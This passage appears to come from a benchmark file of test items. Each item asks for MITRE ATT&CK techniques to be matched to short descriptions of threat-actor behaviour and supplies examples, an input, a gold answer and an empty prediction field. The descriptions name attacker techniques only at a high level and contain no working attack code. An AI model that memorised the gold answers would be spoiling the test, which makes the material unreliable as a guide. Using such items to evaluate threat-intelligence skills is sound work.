specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: During C0015, the threat actors use the command `net group \"domain admins\" /dom` to enumerate domain groups.\n\t - T1069.002: Permission Groups Discovery - Domain Groups\n- Text: has the capability to retrieve information about groups.\n\t - T1069: Permission Groups Discovery\n- Text: CrackMapExec can enumerate the domain user accounts on a targeted system.\n\t - T1087.002: Account Discovery - Domain Account\n", + "input": "GRIFFON has used a reconnaissance module that can be used to retrieve Windows domain membership information.", + "gold": "- T1069.002: Permission Groups Discovery - Domain Groups", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: OopsIE creates and uses a VBScript as part of its persistent execution.\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n- Text: Astaroth executes embedded JScript or VBScript in an XSL stylesheet located on a remote domain.\n\t - T1220: XSL Script Processing\n- Text: On the other hand, FIN7 takes advantage of Mshta, a utility that can execute VBScript, and scheduled tasks to run malicious code on user systems.\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n\t - T1053: Scheduled Task/Job\n\t - T1218.005: System Binary Proxy Execution - Mshta\n", + "input": "Leviathan has used VBScript.", + "gold": "- T1059.005: Command and Scripting Interpreter - Visual Basic", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Adds persistence on the system by creating a shortcut in the user\u2019s Startup folder with the correct cmdline arguments\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n\t - T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n- Text: Attor's dispatcher can establish persistence via adding a Registry key with a logon script \"HKEY_CURRENT_USER\\Environment \"UserInitMprLogonScript\" \".\n\t - T1037.001: Boot or Logon Initialization Scripts - Logon Script (Windows)\n- Text: Tropic Trooper has created the Registry key \"HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell\" and sets the value to establish persistence.\n\t - T1547.004: Boot or Logon Autostart Execution - Winlogon Helper DLL\n", + "input": "GuLoader can establish persistence via the Registry under \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\".", + "gold": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: P.A.S. Webshell has the ability to list and extract data from SQL databases.\n\t - T1213: Data from Information Repositories\n- Text: ZxShell can transfer files from a compromised host.\n\t - T1005: Data from Local System\n- Text: APT28 used a publicly available tool to gather and compress multiple documents on the DCCC and DNC networks.\n\t - T1119: Automated Collection\n\t - T1560: Archive Collected Data\n", + "input": "Turla has used a custom .NET tool to collect documents from an organization's internal central database.", + "gold": "- T1213: Data from Information Repositories", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: WastedLocker can delete shadow volumes.\n\t - T1490: Inhibit System Recovery\n- Text: Naikon has used WMIC.exe for lateral movement.\n\t - T1047: Windows Management Instrumentation\n- Text: Before the driver is loaded, the malware disables crash dump by setting the following registry key\n\t - T1070: Indicator Removal\n\t - T1562.006: Impair Defenses - Indicator Blocking\n\t - T1112: Modify Registry\n", + "input": "Maze has attempted to delete the shadow volumes of infected machines, once before and once after the encryption process.", + "gold": "- T1490: Inhibit System Recovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: downloads additional files from C2 servers.\n\t - T1105: Ingress Tool Transfer\n- Text: TajMahal has the ability to manage an automated queue of egress files and commands sent to its C2.\n\t - T1020: Automated Exfiltration\n- Text: OilRig has used automated collection.\n\t - T1119: Automated Collection\n", + "input": "FELIXROOT downloads and uploads files to and from the victim\u2019s machine.", + "gold": "- T1105: Ingress Tool Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Cobalt Group has used powershell.exe to download and execute scripts.\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: has used Windows DDE for execution of commands and a malicious VBS.\n\t - T1559.002: Inter-Process Communication - Dynamic Data Exchange\n- Text: NanoCore has the capability to download and activate additional modules for execution.\n\t - T1105: Ingress Tool Transfer\n", + "input": "DarkHydrus leveraged PowerShell to download and execute additional scripts for execution.", + "gold": "- T1059.001: Command and Scripting Interpreter - PowerShell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Green Lambert can add \"init.d\" and \"rc.d\" files in the \"/etc\" folder to establish persistence.\n\t - T1037.004: Boot or Logon Initialization Scripts - RC Scripts\n- Text: SMOKEDHAM created a persistence mechanism for NGROK by adding VirtualHost.vbs to the WindNT value under the current users Run registry key\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: NETWIRE can use XDG Autostart Entries to establish persistence.\n\t - T1547.013: Boot or Logon Autostart Execution - XDG Autostart Entries\n", + "input": "iKitten adds an entry to the rc.common file for persistence.", + "gold": "- T1037.004: Boot or Logon Initialization Scripts - RC Scripts", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT32 compromised McAfee ePO to move laterally by distributing malware as a software deployment task.\n\t - T1072: Software Deployment Tools\n- Text: Remcos can access a system\u2019s webcam and take pictures.\n\t - T1125: Video Capture\n- Text: Aquatic Panda has attempted to stop endpoint detection and response (EDR) tools on compromised systems.\n\t - T1562.001: Impair Defenses - Disable or Modify Tools\n", + "input": "Imminent Monitor has a remote microphone monitoring capability.", + "gold": "- T1123: Audio Capture", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Peirates can use stolen service account tokens to perform its operations.\n\t - T1078.004: Valid Accounts - Cloud Accounts\n- Text: BazarLoader is Windows-based malware spread through various methods involving email\n\t - T1588.001: Obtain Capabilities - Malware\n\t - T1587.001: Develop Capabilities - Malware\n\t - T1566.002: Phishing - Spearphishing Link\n\t - T1566.001: Phishing - Spearphishing Attachment\n\t - T1534: Internal Spearphishing\n\t - T1598.002: Phishing for Information - Spearphishing Attachment\n\t - T1566: Phishing\n- Text: Through the use of this platform, the operator was able to monitor and manage various compromised email accounts simultaneously\n\t - T1586.002: Compromise Accounts - Email Accounts\n", + "input": "Lazarus Group has created new email accounts for spearphishing operations.", + "gold": "- T1585.002: Establish Accounts - Email Accounts", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: accesses the HKLM\\System\\CurrentControlSet\\Services\\mssmbios\\Data\\SMBiosData Registry key to obtain the System manufacturer value to identify the machine type.\n\t - T1012: Query Registry\n- Text: Deletes the registry key HKCU\\Software\\Classes\\Applications\\rundll32.exe\\shell\\open Deletes the dropper components from the system\n\t - T1070.004: Indicator Removal - File Deletion\n\t - T1112: Modify Registry\n- Text: Misdat is capable of deleting Registry keys used for persistence.\n\t - T1070: Indicator Removal\n\t - T1070.009: Indicator Removal - Clear Persistence\n", + "input": "Derusbi is capable of enumerating Registry keys and values.", + "gold": "- T1012: Query Registry", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: All three companies indicated that the actors wiped some systems by executing the KillDisk malware at the conclusion of the cyber-attack. The KillDisk malware erases selected files on target systems and corrupts the master boot record, rendering systems inoperable. It was further reported that in at least one instance, Windows-based human-machine interfaces (HMIs) embedded in remote terminal units were also overwritten with KillDisk. The actors also rendered Serial-to-Ethernet devices at substations inoperable by corrupting their firmware. The team assesses that these actions were done in an attempt to interfere with expected restoration efforts\n\t - T1561.002: Disk Wipe - Disk Structure Wipe\n- Text: ObliqueRAT can discover pluggable/removable drives to extract files from.\n\t - T1120: Peripheral Device Discovery\n- Text: The TajMahal framework is an intriguing discovery that\u2019s of great interest, not least for its high level of technical sophistication, which is beyond any doubt. For example, it has its own indexer, emergency C2s, is capable of stealing specific files from external drives when they become available again, etc\n\t - T1083: File and Directory Discovery\n\t - T1119: Automated Collection\n\t - T1041: Exfiltration Over C2 Channel\n", + "input": "NOKKI can gather information on drives and the operating system on the victim\u2019s machine.", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Since December 2017 security researchers have been seeing samples of MS Office documents in spearphishing emails related to the Winter Olympics uploaded to VirusTotal. The documents contained nothing but slightly formatted gibberish to make it look like the text had an encoding problem, encouraging the user to press a button to \u201cEnable Content\u201d.\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: Over 80 files were sent to 40 email accounts within the organization, within the span of about an hour. The email contains Microsoft Excel attachments with malicious macros. When the file is opened, it loads in Microsoft Excel and urges the user to enable macros\n\t - T1204.002: User Execution - Malicious File\n- Text: APT3\u00a0(also known as UPS), the actors responsible for\u00a0Operation Clandestine Fox\u00a0has quietly continued to send waves of spearphishing messages over the past few months. This actor initiated their most recent campaign on November 19, 2014 targeting multiple organizations. The attacker leveraged multiple exploits, targeting both\u00a0CVE-2014-6332\u00a0and\u00a0CVE-2014-4113. CVE-2014-6332 was disclosed publicly on 2014-11-11 and is a Windows OLE Automation Array Remote Code Execution vulnerability. CVE-2014-4113 is a privilege escalation vulnerability that was\u00a0disclosed publicly on 2014-10-14.\n\t - T1587.004: Develop Capabilities - Exploits\n\t - T1566.003: Phishing - Spearphishing via Service\n\t - T1534: Internal Spearphishing\n", + "input": "Dragonfly has sent emails with malicious attachments to gain initial access.", + "gold": "- T1566.001: Phishing - Spearphishing Attachment", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: In this ongoing campaign, FIN7 is targeting organizations with spear phishing emails containing either a malicious DOCX or RTF file \u2013 two versions of the same LNK file and VBScript technique. These lures originate from external email addresses that the attacker rarely re-used, and they were sent to various locations of large restaurant chains, hospitality, and financial service organizations. As with previous campaigns, and as highlighted in our annual M-Trends 2017 report, FIN7 is calling stores at targeted organizations to ensure they received the email and attempting to walk them through the infection process\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: Once installed, JSSLoader provides the threat group with a backdoor to the victim\u2019s computer and the organization\n\t - T1204.002: User Execution - Malicious File\n\t - T1047: Windows Management Instrumentation\n- Text: Torisma is only delivered to a compromised host if the victim's IP address is on an allow-list.\n\t - T1480: Execution Guardrails\n", + "input": "EnvyScout has been executed through malicious files attached to e-mails.", + "gold": "- T1204.002: User Execution - Malicious File", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: FIN7 has used RDP to move laterally in victim environments.\n\t - T1021.001: Remote Services - Remote Desktop Protocol\n- Text: can use MS10-061 to exploit a print spooler vulnerability in a remote system with a shared printer in order to move laterally.\n\t - T1210: Exploitation of Remote Services\n- Text: Conti can spread itself by infecting other remote machines via network shared drives.\n\t - T1080: Taint Shared Content\n", + "input": "Lazarus Group malware SierraCharlie uses RDP for propagation.", + "gold": "- T1021.001: Remote Services - Remote Desktop Protocol", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Conclusion The DarkHydrus group carried out an attack campaign on at least one government agency in the Middle East using malicious .iqy files. The .iqy files take advantage of Excel's willingness to download and include the contents from a remote server in a spreadsheet. DarkHydrus leveraged this obscure file format to run a command to ultimately install a PowerShell scripts to gain backdoor access to the system. The PowerShell backdoor delivered in this current attack may have been custom developed by the threat group, however, it is possible that DarkHydrus pieced together this tool by using code from legitimate open source tools\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: The phishing messages were found to contain a Microsoft Word document attachment that uses VBA macros to install\u202fLookBack malware. When the attachment is executed, the malicious VBA macro within the Microsoft Word attachment drops three Privacy Enhanced Mail (PEM) files to the host: tempgup.txt, tempgup2.txt, and tempsodom.txt. Additionally, the file\u202fTemptcm.tmp,\u202fwhich is a version of certutil.exe,\u202fis dropped to decode the PEM files using\u202fTemptcm.tmp. The macro next creates a copy of the decoded PEM files restoring their proper file extensions with the Windows essentuti.exe. Finally, the macro launches GUP.exe and the libcurl.dll loader separately, resulting in the execution of\u202fLookBack\u202fmalware\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n- Text: This function aims to download the powershell code from the command and control server and execute it\n\t - T1105: Ingress Tool Transfer\n", + "input": "TA505 has used PowerShell to download and execute malware and reconnaissance scripts.", + "gold": "- T1059.001: Command and Scripting Interpreter - PowerShell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: China Chopper's server component can upload local files.\n\t - T1005: Data from Local System\n- Text: OceanSalt can extract drive information from the endpoint and search files on the system.\n\t - T1083: File and Directory Discovery\n- Text: Andariel has inserted a malicious script within compromised websites to collect potential victim information such as browser type, system language, Flash Player version, and other data.\n\t - T1592.002: Gather Victim Host Information - Software\n", + "input": "ROKRAT can collect host data and specific file types.", + "gold": "- T1005: Data from Local System", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: VERMIN collects the OS name, machine name, and architecture information.\n\t - T1082: System Information Discovery\n- Text: The structure of the domain mimics the Mercator Institute for China Studies (MERICS), whose actual domain is merics.org\n\t - T1016: System Network Configuration Discovery\n- Text: To initially gain access to the environment, Managed Defense analysts identified that FIN6 compromised an internet facing system. Following the compromise of this system, analysts identified FIN6 leveraged stolen credentials to move laterally within the environment using the Windows\u2019 Remote Desktop Protocol (RDP\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n\t - T1021.001: Remote Services - Remote Desktop Protocol\n\t - T1078: Valid Accounts\n", + "input": "Turian can retrieve system information including OS version, memory usage, local hostname, and system adapter information.", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Our initial discovery of GravityRAT was through a malicious Word document. We were able to discover four distinct versions of GravityRAT, developed over two years\n\t - T1559.002: Inter-Process Communication - Dynamic Data Exchange\n- Text: OilRig has delivered macro-enabled documents that required targets to click the \"enable content\" button to execute the payload on the system.\n\t - T1204.002: User Execution - Malicious File\n- Text: For C0015, security researchers assessed the threat actors likely used a phishing campaign to distribute a weaponized attachment to victims.\n\t - T1566.001: Phishing - Spearphishing Attachment\n", + "input": "Sharpshooter has sent malicious Word OLE documents to victims.", + "gold": "- T1559.002: Inter-Process Communication - Dynamic Data Exchange", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: As the final reconnaissance step, if the system is domain-joined, BoomBox executes an LDAP query to gather data such as distinguished name, SAM account name, email, and display name of all domain users via the filter (&(objectClass=user)(objectCategory=person\n\t - T1087.003: Account Discovery - Email Account\n\t - T1087.002: Account Discovery - Domain Account\n- Text: TeamTNT has queried the AWS instance metadata service for credentials.\n\t - T1552.005: Unsecured Credentials - Cloud Instance Metadata API\n- Text: WhisperGate can enumerate connected remote logical drives.\n\t - T1135: Network Share Discovery\n", + "input": "IcedID can query LDAP to identify additional users on the network to infect.", + "gold": "- T1087.002: Account Discovery - Domain Account", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: As part of its initialization, the implant gathers basic system information and sends it to its hardcoded control server 203.131.222.83 using SSL over port 443\n\t - T1124: System Time Discovery\n- Text: can gather the victim user name.\n\t - T1033: System Owner/User Discovery\n- Text: gets an output of running processes using the tasklist command.\n\t - T1057: Process Discovery\n", + "input": "Sidewinder has used tools to obtain the current system time.", + "gold": "- T1124: System Time Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Aquatic Panda has attempted to harvest credentials through LSASS memory dumping.\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n- Text: SecretsDump and Mimikatz modules within Impacket can perform credential dumping to obtain account and password information from NTDS.dit.\n\t - T1003.003: OS Credential Dumping - NTDS\n- Text: It reads and executes commands from a text file stored in Mega cloud storage\n\t - T1530: Data from Cloud Storage\n", + "input": "Fox Kitten has used prodump to dump credentials from LSASS.", + "gold": "- T1003.001: OS Credential Dumping - LSASS Memory", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: HTTPBrowser is capable of listing files, folders, and drives on a victim.\n\t - T1083: File and Directory Discovery\n- Text: SDBbot can collected the country code of a compromised machine.\n\t - T1614: System Location Discovery\n- Text: Magic Hound has used a web shell to exfiltrate a ZIP file containing a dump of LSASS memory on a compromised machine.\n\t - T1005: Data from Local System\n", + "input": "Saint Bot can search a compromised host for specific files.", + "gold": "- T1083: File and Directory Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Indicators of compromise MITRE ATT&CK techniques Modify existing service Code signing File deletion Deobfuscate/decode files or information System information discovery Process discovery Service execution RunDLL32 Scripting Command-line Interface Data from local system Automated exfiltration Data encrypted Commonly used port Bypass user account control Hashes fe32d29fa16b1b71cd27b23a78ee9f6b7791bff3 f684e15dd2e84bac49ea9b89f9b2646dc32a2477 1d280a77595a2d2bbd36b9b5d958f99be20f8e06 19d9573f0b2c2100accd562cc82d57adb12a57ec f90a2155ac492c3c2d5e1d83e384e1a734e59cc0 9b832dda912cce6b23da8abf3881fcf4d2b7ce09 f3b62fea38cb44e15984d941445d24e6b309bc7b 66d2cea01b46c3353f4339a986a97b24ed89ee18 7113aaab61cacb6086c5531a453adf82ca7e7d03 d41daba0ebfa55d0c769ccfc03dbf6a5221e006a 25f4819e7948086d46df8de2eeeaa2b9ec6eca8c 35ab747c15c20da29a14e8b46c07c0448cef4999 e87de3747d7c12c1eea9e73d3c2fb085b5ae8b42 0e4a7c0242b98723dc2b8cce1fbf1a43dd025cf0 bca861a46d60831a3101c50f80a6d626fa99bf16 01530adb3f947fabebae5d9c04fb69f9000c3cef 4229896d61a5ad57ed5c247228606ce62c7032d0 4c7e975f95ebc47423923b855a7530af52977f57 5a6ad7a1c566204a92dd269312d1156d51e61dc4 1dc50bfcab2bc80587ac900c03e23afcbe243f64 003e21b02be3248ff72cc2bfcd05bb161b6a2356 9b7c3c48bcef6330e3086de592b3223eb198744a 85e2453b37602429596c9681a8c58a5c6faf8d0c Domains ftp.byethost31.com ftp.byethost11.com 1113427185.ifastnet.org navermail.byethost3.com nihon.byethost3.com\n\t - T1048: Exfiltration Over Alternative Protocol\n- Text: Chimera has used Cobalt Strike C2 beacons for data exfiltration.\n\t - T1041: Exfiltration Over C2 Channel\n- Text: MoonWind saves information from its keylogging routine as a .zip file in the present working directory.\n\t - T1074.001: Data Staged - Local Data Staging\n", + "input": "TeamTNT has sent locally staged files with collected credentials to C2 servers using cURL.", + "gold": "- T1048: Exfiltration Over Alternative Protocol", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: ZxxZ has created a snapshot of running processes using `CreateToolhelp32Snapshot`.\n\t - T1057: Process Discovery\n- Text: Once the target\u2019s machine is compromised, the attacker first enumerates all processes running in the system and all services. Then the attacker looks for all administrator accounts on both the local machine and the network. This reflects the Poseidon Group\u2019s familiarity with Windows network administration\n\t - T1057: Process Discovery\n\t - T1007: System Service Discovery\n- Text: EVILNUM can search for anti-virus products on the system.\n\t - T1518.001: Software Discovery - Security Software Discovery\n", + "input": "Deep Panda uses the Microsoft Tasklist utility to list processes running on systems.", + "gold": "- T1057: Process Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Machete uses FTP for Command & Control.\n\t - T1071.002: Application Layer Protocol - File Transfer Protocols\n- Text: may be used to exfiltrate data separate from the main command and control protocol.\n\t - T1048: Exfiltration Over Alternative Protocol\n- Text: CosmicDuke exfiltrates collected files over FTP or WebDAV. Exfiltration servers can be separately configured from C2 servers.\n\t - T1048.003: Exfiltration 